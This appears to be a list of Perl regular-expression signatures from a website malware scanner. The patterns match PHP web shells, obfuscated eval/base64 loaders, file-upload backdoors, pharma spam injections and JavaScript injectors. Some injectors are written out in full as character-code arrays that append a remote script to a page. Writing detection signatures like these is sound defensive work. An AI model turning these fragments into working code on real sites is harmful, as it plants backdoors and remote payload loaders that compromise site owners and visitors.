qr/<\?php \$([A-z0-9_]{1,20}) = \'gzun\'\. \'comp\'\. \'ress\';\$([A-z0-9_]{1,20}) = \'b\' \.\'a\' \.\'s\' \.\'e\' \.\'6\' \.\'4\' \.\'_\' \.\'d\' \.\'e\' \.\'c\' \.\'o\' \.\'d\' \.\'e\';\$([A-z0-9_]{1,20}) = \'imp\' \.\'lod\' \.\'e\';\$([A-z0-9_]{1,20}) = array\(.+?\); eval\( \$([A-z0-9_]{1,20}) \(\$([A-z0-9_]{1,20}) \(\$([A-z0-9_]{1,20}) \(\'\',\$([A-z0-9_]{1,20})\)\)\)\); \?>/is,
qr/<\?php\s+set_time_limit\(0\);\s+error_reporting\(0\);\s+\$auth_pass.+?\/\/ con7extwebshell\s+\$con7ext2 =.+?eval\(str_rot13\(gzinflate\(str_rot13\(base64_decode\(\(\$con7ext2\)\)\)\)\)\);/is,
qr/<\?php.+?\$auth_pass =.+?eval\(str_rot13\(gzinflate\(str_rot13\(base64_decode\(\(\$([A-z0-9_]{1,20})\)\)\)\)\)\);/is,
qr/<\? \$([A-z0-9_]{1,20})=\$_GET\[\'hamza\'\].+?\@move_uploaded_file\(\$userfile_tmp.+?value=\"Submit\"><\/form>\';\}\}\?>/is,
qr/<html>\s+<head>\s+<title>Symlink Get Config.+?echo system\(\'ls \/var\/mail\'\);.+?symlink\(\'\/var\/www\/html\/include\/connect\.php\',\'OTHER\.txt\'\);.+?\?>\s+<\/td><\/table><\/body><\/html>/is,
qr/<\?php\s+function query_str\(\$params\)\{.+?Priv8.+?sent successfully\'\); <\/script>\";\}\}\s+\?>\s+<\/body>\s+<\/html>/is,
qr/<\?php print_r\(eval\(\$_POST\[0\]\)\);/is,
qr/<\?php if\(\$_GET\[\"login\"\].+?\$([A-z0-9_]{1,20})=base64_decode\(\$_POST\[\"([A-z0-9_]{1,20})\"\]\); \@eval\(\"\\\$([A-z0-9_]{1,20}) = \$([A-z0-9_]{1,20});\"\);\}.+?value=\"submit\"\/><\/form>/is,
qr/<\?php\s+error_reporting\(0\);\s+if\(array_keys\(\$_GET\)\[0\] == \'([A-z0-9_]{1,20})\'\)\{\s+\$spacer_open\s+\{\$\{eval\(base64_decode\(.+?\'\)\)\}\}\{\$\{exit\(\)\}\}&\s+\$_phpinclude_output;/is,
qr/<\?php.+?\$auth_pass =.+?eval\(gzinflate\(str_rot13\(base64_decode\(.+?\)\)\)\);\s+\?>/is,
qr/<\?php if\(empty\(\$_GET\[\'ineedthispage\'\]\) && \$_SERVER\[\'REQUEST_URI\'\]!=\"\/\" && \$_SERVER\[\'REQUEST_URI\'\]!=\"\/index\.php\" && !empty\(\$_SERVER\[\'REQUEST_URI\'\]\)\) \{ini_set\(\'display_errors\',\"Off\"\);ignore_user_abort\(1\);\$.+?;\};\s+\/\/item->alias\s+\?>/is,
qr/<\?php \$([A-z0-9_]{1,20}) = \'strr\'\.chr\(101\)\.\'v\';\$([A-z0-9_]{1,20}) = array\(.+?eval\(\$([A-z0-9_]{1,20})\(\$([A-z0-9_]{1,20})\(\$([A-z0-9_]{1,20})\(\'\',\$([A-z0-9_]{1,20})\)\)\)\); \?>/is,
qr/<\?php\s+\/\*\*\s+\* Plugin Name: Login Wall.+?if \(!defined\(\'LoginWall\'\)\)\{\s+define\( \'LoginWall\',1\);.+?add_action\(\'login_form\',\'fs_login_session\'\);\s+\}/is,
qr/<\?php if\(\$_POST\[\'([A-z0-9_]{1,20})\'\]==\'\'\)\{echo\(\'->\|OK\|-<\'\);exit\(\);\}eval\(\$_POST\[\'([A-z0-9_]{1,20})\'\]\);\?>/is,
qr/<\?php \/\*Packed BLOB icon data\. Corruption may result script execution errors\. Don\'t touch it unless you know what you are doing\.\*\/ eval\(base64_decode\(.+?\)\);\?>/is,
qr/<div class=\"product_listing_descrip\">.+?<a href=\"http\:\/\/.+?generic levitra.+?alt=\"viagra\">viagra<\/a><\/div>/is,
qr/<script type=\"text\/javascript\">eval\(unescape\(\" \%76\%61.+?\%3B\%7D \"\)\)<\/script><\/div>/is,
qr/<\?php\s+function_exists\(\'date_default_timezone\'\) \? date_default_timezone_set\(\'America\/Los_Angeles\'\) : \@eval\(base64_decode\(\$_REQUEST\[\'c_id\'\]\)\);/is,
qr/<\?PHP\s+define\(\'REAL_SERVER_ROOT\', \'SERVER\'\);.+?define\(\'SYSTEM_SKEL_DIR\', \'skel\'\) \? \@eval\(base64_decode\(\$_REQUEST\[\'c_id\'\]\)\) : define\(\'SYSTEM_SKEL_PATH\', SYSTEM_CONF_PATH \. \'\/\' \. SYSTEM_SKEL_DIR\);.+?define\(\'WORKGROUPS_META_SETTINGS_FILENAME\', \'settings\.xml\'\);\s+\?>/is,
qr/<\?php if\(\$_GET\[\'test\'\]\)\{echo \'success\';\}else\{\(\$www= \$_POST\[\'([A-z0-9_]{1,20})\'\]\) && \@preg_replace\(\'\/ad\/e\',\'@\'\.str_rot13\(\'riny\'\)\.\'\(\$www\)\', \'add\'\);\}/is,
qr/<\?php \/\*([A-z0-9_]{1,20})\*\/ error_reporting\(0\); \@ini_set\(\'error_log\',NULL\); \@ini_set\(\'log_errors\',0\); \@ini_set\(\'display_errors\',\'Off\'\); \@eval\( base64_decode\(\'aWYo.+?\)\); \@ini_restore\(\'error_log\'\); \@ini_restore\(\'display_errors\'\); \/\*([A-z0-9_]{1,20})\*\/ \?>/is,
qr/<script type=\"text\/javascript\"><\/script><script type=\"text\/javascript\">var _0x2515=\[\"\",\"\\x6A\\x6F\\x69\\x6E\".+?\(_0x2515\[0\]\)\);<\/script>/is,
qr/<\?php\s+\/\*([A-z0-9_]{1,20})\*\/\s+\@include \"\\057ho.+?ic\\157\";\s+\/\*([A-z0-9_]{1,20})\*\/\s+echo \@file_get_contents\(\'index\.html\.bak\.bak\'\);/is,
qr/<\?php \$GLOBALS\[\'([A-z0-9_]{1,20})\'\]=Array\(\'str_\' \.\'rot13\',\'pack\',\'st\' \.\'rrev\'\); \?>/is,
qr/<\?php function ([A-z0-9_]{1,20})\(\$i\)\{\$a=Array\(\"([A-z0-9_]{1,20})\",\"([A-z0-9_]{1,20})\",\"([A-z0-9_]{1,20})\",\"([A-z0-9_]{1,20})\",\"H*\"\);return \$a\[\$i\];\} \?>/is,
qr/<\?php function ([A-z0-9_]{1,20})\(\$([A-z0-9_]{1,20})\)\{return isset\(\$_COOKIE\[\$([A-z0-9_]{1,20})\]\)\?\$_COOKIE\[\$([A-z0-9_]{1,20})\].+?if\(\!empty\(\$([A-z0-9_]{1,20})\)\)\{\$([A-z0-9_]{1,20})=\$GLOBALS\[\'([A-z0-9_]{1,20})\'\]\[0\]\(\@\$GLOBALS\[\'([A-z0-9_]{1,20})\'\]\[1\]\(.+?if\(isset\(\$([A-z0-9_]{1,20})\)\)\{\@eval\(\$([A-z0-9_]{1,20})\);exit\(\);\}\}/is,
qr/<\?php error_reporting\(0\);chmod\(basename\(\$_SERVER\[\"PHP_SELF\"\]\), 0444\);echo\(\"\#0x2525\"\);if\(isset\(\$_GET\[\"u\"\]\)\)\{echo\'<form action=\"\" method=\"post\" enctype=\"multipart\/form-data\" name=\"uploader\" id=\"uploader\">\';echo\'<input type=\"file\" name=\"file\" size=\"30\"><input name=\"_upl\" type=\"submit\" id=\"_upl\" value=\"Upload\"><\/form>\';if\(\$_POST\[\'_upl\'\]==\"Upload\"\)\{if\(\@copy\(\$_FILES\[\'file\'\]\[\'tmp_name\'\],\$_FILES\[\'file\'\]\[\'name\'\]\)\)\{echo\'Success\';\}else\{echo\'Fail\';\}\};\};/is,
qr/<script type=\'text\/javascript\' src=\'https:\/\/stat\.uustoughtonma\.org\/stats\.js.+?\'><\/script><script type=\'text\/javascript\' src=\'https:\/\/cdn\.allyouwant\.online\/main\.js.+?\'><\/script>/is,
qr/<script language=javascript>eval\(String\.fromCharCode\(118, 97, 114, 32, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 46, 116, 121, 112, 101, 32, 61, 32, 39, 116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 39, 59, 32, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 46, 97, 115, 121, 110, 99, 32, 61, 32, 116, 114, 117, 101, 59, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 46, 115, 114, 99, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 49, 48, 49, 44, 32, 49, 50, 48, 44, 32, 57, 55, 44, 32, 49, 48, 57, 44, 32, 49, 48, 52, 44, 32, 49, 49, 49, 44, 32, 49, 48, 57, 44, 32, 49, 48, 49, 44, 32, 52, 54, 44, 32, 49, 49, 48, 44, 32, 49, 48, 49, 44, 32, 49, 49, 54, 44, 32, 52, 55, 44, 32, 49, 49, 53, 44, 32, 49, 49, 54, 44, 32, 57, 55, 44, 32, 49, 49, 54, 44, 32, 52, 54, 44, 32, 49, 48, 54, 44, 32, 49, 49, 53, 44, 32, 54, 51, 44, 32, 49, 49, 56, 44, 32, 54, 49, 44, 32, 52, 57, 44, 32, 52, 54, 44, 32, 52, 56, 44, 32, 52, 54, 44, 32, 53, 48, 41, 59, 32, 32, 32, 118, 97, 114, 32, 97, 108, 108, 115, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 118, 97, 114, 32, 110, 116, 51, 32, 61, 32, 116, 114, 117, 101, 59, 32, 102, 111, 114, 32, 40, 32, 118, 97, 114, 32, 105, 32, 61, 32, 97, 108, 108, 115, 46, 108, 101, 110, 103, 116, 104, 59, 32, 105, 45, 45, 59, 41, 32, 123, 32, 105, 102, 32, 40, 97, 108, 108, 115, 91, 105, 93, 46, 115, 114, 99, 46, 105, 110, 100, 101, 120, 79, 
102, 40, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 49, 44, 32, 49, 50, 48, 44, 32, 57, 55, 44, 32, 49, 48, 57, 44, 32, 49, 48, 52, 44, 32, 49, 49, 49, 44, 32, 49, 48, 57, 44, 32, 49, 48, 49, 41, 41, 32, 62, 32, 45, 49, 41, 32, 123, 32, 110, 116, 51, 32, 61, 32, 102, 97, 108, 115, 101, 59, 125, 32, 125, 32, 105, 102, 40, 110, 116, 51, 32, 61, 61, 32, 116, 114, 117, 101, 41, 123, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 34, 104, 101, 97, 100, 34, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 41, 59, 32, 125\)\);<\/script>/is,
qr/eval\(String\.fromCharCode\(118, 97, 114, 32, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 46, 116, 121, 112, 101, 32, 61, 32, 39, 116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 39, 59, 32, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 46, 97, 115, 121, 110, 99, 32, 61, 32, 116, 114, 117, 101, 59, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 46, 115, 114, 99, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 49, 48, 49, 44, 32, 49, 50, 48, 44, 32, 57, 55, 44, 32, 49, 48, 57, 44, 32, 49, 48, 52, 44, 32, 49, 49, 49, 44, 32, 49, 48, 57, 44, 32, 49, 48, 49, 44, 32, 52, 54, 44, 32, 49, 49, 48, 44, 32, 49, 48, 49, 44, 32, 49, 49, 54, 44, 32, 52, 55, 44, 32, 49, 49, 53, 44, 32, 49, 49, 54, 44, 32, 57, 55, 44, 32, 49, 49, 54, 44, 32, 52, 54, 44, 32, 49, 48, 54, 44, 32, 49, 49, 53, 44, 32, 54, 51, 44, 32, 49, 49, 56, 44, 32, 54, 49, 44, 32, 53, 48, 44, 32, 52, 54, 44, 32, 53, 48, 44, 32, 52, 54, 44, 32, 53, 48, 44, 32, 52, 54, 44, 32, 53, 48, 44, 32, 52, 54, 44, 32, 53, 48, 41, 59, 32, 32, 32, 118, 97, 114, 32, 97, 108, 108, 115, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 118, 97, 114, 32, 110, 116, 51, 32, 61, 32, 116, 114, 117, 101, 59, 32, 102, 111, 114, 32, 40, 32, 118, 97, 114, 32, 105, 32, 61, 32, 97, 108, 108, 115, 46, 108, 101, 110, 103, 116, 104, 59, 32, 105, 45, 45, 59, 41, 32, 123, 32, 105, 102, 32, 40, 97, 108, 108, 115, 91, 105, 93, 46, 115, 114, 
99, 46, 105, 110, 100, 101, 120, 79, 102, 40, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 49, 44, 32, 49, 50, 48, 44, 32, 57, 55, 44, 32, 49, 48, 57, 44, 32, 49, 48, 52, 44, 32, 49, 49, 49, 44, 32, 49, 48, 57, 44, 32, 49, 48, 49, 41, 41, 32, 62, 32, 45, 49, 41, 32, 123, 32, 110, 116, 51, 32, 61, 32, 102, 97, 108, 115, 101, 59, 125, 32, 125, 32, 105, 102, 40, 110, 116, 51, 32, 61, 61, 32, 116, 114, 117, 101, 41, 123, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 34, 104, 101, 97, 100, 34, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 41, 59, 32, 125\)\);/is,
qr/<script language=javascript>var _0xfcc4=\[\"\\x66\\x72.+?\\x74\\x68\"\];var url=String\[_0xfcc4\[0\]\]\(104.+?\]\)\{n= false\}\};if\(n== true\)\{a\(\)\}\}<\/script>/is,
qr/var _0xfcc4=\[\"\\x66\\x72.+?\\x74\\x68\"\];var url=String\[_0xfcc4\[0\]\]\(104.+?\]\)\{n= false\}\};if\(n== true\)\{a\(\)\}\}/is,
qr/<\?php \@file_put_contents\(\'([A-z0-9_]{1,20})\'\,\'<\?php \'\.base64_decode\(\$_REQUEST\[\'([A-z0-9_]{1,20})\'\]\)\); \@include\(\'([A-z0-9_]{1,20})\'\); \@unlink\(\'([A-z0-9_]{1,20})\'\); \?>/is,
qr/<\?php \$([A-z0-9_]{1,20}) = \'find \/ -type f -name \"\*\" \| xargs grep -rl \"<head\"\';\s+\$([A-z0-9_]{1,20}) = \"<script language=javascript>eval\(String\.fromCharCode\(.+?\@system\(\"chmod 777 \"\.\$([A-z0-9_]{1,20})\);\s+\@file_put_contents\(\$([A-z0-9_]{1,20}),\$([A-z0-9_]{1,20})\);\s+echo \$([A-z0-9_]{1,20});\s+\}\s+\}\s+\}/is,
qr/eval\(String\.fromCharCode\(118, 97, 114, 32, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 46, 116, 121, 112, 101, 32, 61, 32, 39, 116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 39, 59, 32, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 46, 97, 115, 121, 110, 99, 32, 61, 32, 116, 114, 117, 101, 59, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 46, 115, 114, 99, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 49, 48, 49, 44, 32, 49, 50, 48, 44, 32, 57, 55, 44, 32, 49, 48, 57, 44, 32, 49, 48, 52, 44, 32, 49, 49, 49, 44, 32, 49, 48, 57, 44, 32, 49, 48, 49, 44, 32, 52, 54, 44, 32, 49, 49, 48, 44, 32, 49, 48, 49, 44, 32, 49, 49, 54, 44, 32, 52, 55, 44, 32, 49, 49, 53, 44, 32, 49, 49, 54, 44, 32, 57, 55, 44, 32, 49, 49, 54, 44, 32, 52, 54, 44, 32, 49, 48, 54, 44, 32, 49, 49, 53, 44, 32, 54, 51, 44, 32, 49, 49, 56, 44, 32, 54, 49, 44, 32, 52, 57, 44, 32, 52, 54, 44, 32, 52, 56, 44, 32, 52, 54, 44, 32, 53, 49, 41, 59, 32, 32, 32, 118, 97, 114, 32, 97, 108, 108, 115, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 118, 97, 114, 32, 110, 116, 51, 32, 61, 32, 116, 114, 117, 101, 59, 32, 102, 111, 114, 32, 40, 32, 118, 97, 114, 32, 105, 32, 61, 32, 97, 108, 108, 115, 46, 108, 101, 110, 103, 116, 104, 59, 32, 105, 45, 45, 59, 41, 32, 123, 32, 105, 102, 32, 40, 97, 108, 108, 115, 91, 105, 93, 46, 115, 114, 99, 46, 105, 110, 100, 101, 120, 79, 102, 40, 83, 116, 114, 105, 
110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 49, 44, 32, 49, 50, 48, 44, 32, 57, 55, 44, 32, 49, 48, 57, 44, 32, 49, 48, 52, 44, 32, 49, 49, 49, 44, 32, 49, 48, 57, 44, 32, 49, 48, 49, 41, 41, 32, 62, 32, 45, 49, 41, 32, 123, 32, 110, 116, 51, 32, 61, 32, 102, 97, 108, 115, 101, 59, 125, 32, 125, 32, 105, 102, 40, 110, 116, 51, 32, 61, 61, 32, 116, 114, 117, 101, 41, 123, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 34, 104, 101, 97, 100, 34, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 41, 59, 32, 125\)\);/is,
qr/<\?php\s+error_reporting\(E_ERROR\);set_time_limit\(0\);\s+if\(isset\(\$_POST\[\'([A-z0-9_]{1,20})\'\]\)\)\{\s+\$tofile=\'40\d\.php\';\s+\$([A-z0-9_]{1,20}) =base64_decode\(strtr\(\$_POST\[\'([A-z0-9_]{1,20})\'\], \'\-\_,\', \'\+\/=\'\)\);\s+\$([A-z0-9_]{1,20})=\'<\?php \'\.\$([A-z0-9_]{1,20})\.\'\?>\';\s+\@file_put_contents\(\$tofile,\$([A-z0-9_]{1,20})\);\s+require_once\(\'40\d\.php\'\);\s+\@unlink\(\$tofile\);\s+exit;\s+\}\s+\?>/is,
qr/<\?php \/\*([A-z0-9_]{1,20})\*\/ \?>/is,
qr/<\?php \$([A-z0-9_]{1,20}) = \".+?function ([A-z0-9_]{1,30})\(\$\w,\$\w,\$\w\)\{return \$\w\.\$\w\.\$\w;\}\$.+?\(\"o\\x64e\",chr\(40\),\"\"\);\$.+?\"\.\$([A-z0-9_]{1,20});\$([A-z0-9_]{1,20})\(\'\', \'\}\'\.\$([A-z0-9_]{1,20})\.\'\/\/\'\);\s+\?>/is,
qr/<\?php function ([A-z0-9_]{1,30})\(\$\w,\$\w,\$\w\)\{return \$\w\.\$\w\.\$\w;\}\$.+?\(\"\\x65va\",chr\(108\),\"\"\.chr\(40\)\);\$.+?\'\"\.\$([A-z0-9_]{1,20});\$([A-z0-9_]{1,20})\(\'\', \'\}\'\.\$([A-z0-9_]{1,20})\.\'\/\/\'\);/is,
qr/<\?php\s+if\(isset\(\$_POST\[\'([A-z0-9_]{1,30})\'\]\)\)\{\s+\$index=\$_SERVER\[\'DOCUMENT_ROOT\'\]\.base64_decode\(strtr\(\$_POST\[\'filename\'\],\'\-\_,\',\'\+\/=\'\)\);.+?if\(strlen\(\$\w\)<300\)\{echo \'indexcode is null\';exit;\}\s+if\(file_exists\(\$index\)\)\{\@chmod\(\$index,0755\);\@unlink\(\$index\);\}\@file_put_contents\(\$index,\$\w\);echo \'ok\';\s+\}\s+\?>/is,
qr/\*\/ \@ini_set\(\'display_errors\',\'off\'\); \@ini_set\(\'log_errors\',0\); \@ini_set\(\'error_log\',NULL\);.+?\$not_found_report = strrev \(.+?\$not_found_page\.\'\"><\/script><\/noindex><\/nofollow>\';\} \?><\?php \/\*/is,
qr/<\?php.+?\$lyrics3size\s+= strrev\(substr\(strrev\(\$lyrics3_id3v1\), 9, 6\)\) + 6 + strlen\(\'LYRICS200\'\);.+?public function IntString2Bool\(\$char\) \{.+?\} \*\//is,
qr/<\?php\s+\/\*\*\s+\* SimplePie.+?if\(\!is_function_enabled\(\'base64_decode\'\)\)\{\$errors\.=\"I_have_problem_with_base64_decode\\t\";\$errorsforlocal\.=.+?\}\s+\} \*\//is,
qr/<\?php if\(isset\(\$_POST\[\"([A-z0-9_]{1,20})\"\]\)\)\{eval\(stripslashes\(\$_POST\[\"([A-z0-9_]{1,20})\"\]\)\);exit;\}; \?>/is,
qr/\*\/\s+\@\$wordpress404=\"e\\x76.+?\$wordpress401\(\$wp\[30\]\.\$wp\[31\]\.\$wp\[27\]\.\$wp\[30\]\.\$wp\[4\],\$wordpress404,\"\"\);\s+\/\*/is,
qr/<\?php.+?if\(empty\(\$_GET\[\'ineedthispage\'\]\)\)\{ini_set\(\'display_errors\',\"Off\"\);ignore_user_abort\(1\);\$.+?if\(\!empty\(\$_COOKIE\[\'PHPSSIDDD2\'\]\)\)\{\$.+?\)\];\}return\$([A-z0-9_]{1,20});\};\s+\/\/item->alias\s+\?>/is,
qr/if\(isset\(\$_REQUEST\[\'bot\'\]\)\) assert\(stripslashes\(\$_REQUEST\[bot\]\)\);/is,
qr/<\?php\s+class XYZ_Logger\s+\{.+?\$this->backdoorFile\(\$path\);\s+\}\s+\}\s+\$fabLicense = <<<EOF\s+<\?php \/\*.+?if \(\@\$_GET\[\'rm\'\]\) \{\s+\@unlink\(\_\_FILE\_\_\);\s+\}/is,
qr/<\?php\s+\$combatwork=\"yes\";.+?\$linkstable = \'wp_old_lcache\';.+?mysqli_close\(\$dbcon\);return\$row_count;\}\}\?>/is,
qr/<\?php\s+header\(.+?array\(\'index\.php\',\'index\.html\',\'index\.htm\',\'index\.shtml\',\'index\.html\.bak\.bak\',\'index\.html\.bak\',\'default\.htm\',\'default\.html\'\);.+?function traverse\(\$path = \'\.\'\) \{.+?return \$file_array;\s+\}/is,
qr/<\?php \$([A-z0-9_]{1,20}) = array\(.+?\);\$([A-z0-9_]{1,20}) = array\(\'base\' ,\'64_d\' ,\'ecod\' ,\'e\'\); \$([A-z0-9_]{1,20}) = array\(\'gz\', \'un\', \'co\', \'mp\', \'re\', \'ss\'\) ;\$.+?\) \) \) \) ; \?>/is,
qr/<\?php\s+if\(isset\(\$_GET\[\'fuck\'\]\) \&\& \$_GET\[\'fuck\'\] == \'1\'\)\{\s+\$name=\'simple\.php\';\/\/.+?unlink\(\"\.\/get\.php\"\);\s+\}else\{\s+echo \"the file is ok\.\.\.\.\";\s+\}/is,
qr/eval\(str_rot13\(\'([A-z0-9_]{1,20}) ([A-z0-9_]{1,20})\(\)\{([A-z0-9_]{1,20})\(\!\(.+?\(\);\'\)\);/is,
qr/eval\(str_rot13\(\'.+?\(\_\_SVYR\_\_\)\.\"\/.+?\}\}([A-z0-9_]{1,20})\(\);\'\)\);/is,
qr/ob_start\(\"security_update\"\); function security_update\(\$buffer\)\{return \$buffer\.base64_decode\(.+?\'\);\}/is,
qr/<\?php\s+\/\*\*\s+\* Leaf PHP Mailer by \[leafmailer\.pw\].+?\$password =.+?\$code_=\'.+?\$ccc=str_rot13\(gzinflate\(base64_decode\(\$code_\)\)\);\s+eval\(\$ccc\);\s+\?>/is,
qr/<\?php\s+error_reporting\(0\);\s+\$file=\"\.\/public_html\/error\.php\";\s+\$shellcode = \(\"<\? eval\(base64_decode\(.+?\'\)\); \?>\"\);\s+\$fopen=fopen\(\$file,\"a\+\"\);\s+\$fwrite=fwrite\(\$fopen,\$shellcode\);\s+\$fclose=fclose\(\$fopen\);\s+\?>/is,
qr/<\?php \$GLOBALS\[.+?foreach \(\$GLOBALS\[\$GLOBALS\[\'([A-z0-9_]{1,20})\'\].+?\$([A-z0-9_]{1,20}) = \@\$GLOBALS\[\$GLOBALS\[.+?elseif \(\$([A-z0-9_]{1,20})\[\$GLOBALS\[.+?eval\(\$([A-z0-9_]{1,20})\[\$GLOBALS\[\'([A-z0-9_]{1,20})\'\]\[\d\]\]\);\s+\}\s+\}/is,
qr/<\?php \$([A-z0-9_]{1,20}) = \'g\'\. \'z\'\. \'u\'\. \'n\'\. \'c\'\. \'o\'\. \'m\'\. \'p\'\. \'r\'\. \'e\'\. \'s\'\. \'s\';\$([A-z0-9_]{1,20}) = \'ba\' \.\'se\' \.\'64\' \.\'_d\' \.\'ec\' \.\'od\' \.\'e\';\$([A-z0-9_]{1,20}) = \'imp\' \.\'lod\' \.\'e\';\$([A-z0-9_]{1,20}) = array\(\".+?\)\)\)\); \?>/is,
qr/<\?php.+?\$default_charset=\'Wind\'\.\'o\.\'\.\'ws-12\'\.\'51\';\s+\$default_action=\'F\'\.\'il\'\.\'esMan\';\s+\$color=\'\#d\'\.\'f5\';\s+\$default_use_ajax=true;\s+\$JFactory = strrev\(\'edo\'\.\'c\'\.\'ed_4\'\.\'6e\'\.\'sab\'\);\s+\$JComponentHelper = strrev\(\'ecalp\'\.\'er\'\.\'_ge\'\.\'rp\'\);.+?\\x29\\x29\\x3B\",\"\.\"\);\s+\?>/is,
qr/<\?php \$([A-z0-9_]{1,20}) = array\(\'.+?array\(\'b\' ,\'a\' ,\'s\' ,\'e\' ,\'6\' ,\'4\' ,\'_\' ,\'d\' ,\'e\' ,\'c\' ,\'o\' ,\'d\' ,\'e\'\); \$([A-z0-9_]{1,20}) = array\(\'g\', \'z\', \'u\', \'n\', \'c\', \'o\', \'m\', \'p\', \'r\', \'e\', \'s\', \'s\'\) ;\$.+?\) \) \) \) ; \?>/is,
qr/<\?php echo eval\(base64_decode\(str_replace\(\'\*\',\'a\',str_replace\(\'%\',\'B\',str_replace\(\'~\',\'F\',str_replace\(\'_\',\'z\',str_replace\(\'\$\',\'x\',str_replace\(\'\@\',\'d\',str_replace\(\'^\',\'3\',str_rot13\(.+?\)\)\)\)\)\)\)\)\)\); \?>/is,
qr/<\?php \$([A-z0-9_]{1,20}) = \'\'\.chr\(115\)\.\'t\'\.chr\(114\)\.\'r\'\.chr\(101\)\.\'v\';\$([A-z0-9_]{1,20}) = array\(.+?\$([A-z0-9_]{1,20})\(\'ed\'\.chr\(111\)\.\'ced_46\'\.chr\(101\)\.\'\'\.chr\(115\)\.\'\'\.chr\(97\)\.\'\'\.chr\(98\)\.\'\'\);\$.+?\)\)\)\); \?>/is,
qr/<\?php \$([A-z0-9_]{1,20}) = \'s\'\.chr\(116\)\.\'r\'\.chr\(114\)\.\'ev\';\$([A-z0-9_]{1,20}) = array\(.+?\$([A-z0-9_]{1,20})\(\'edo\'\.\'ced\'\.\'_46\'\.\'esa\'\.\'b\'\);\$.+?\$([A-z0-9_]{1,20})\(\'eta\'\.\'lfn\'\.\'izg\'\);eval\(\$([A-z0-9_]{1,20})\(\$([A-z0-9_]{1,20})\(\$([A-z0-9_]{1,20})\(\'\',\$([A-z0-9_]{1,20})\)\)\)\); \?>/is,
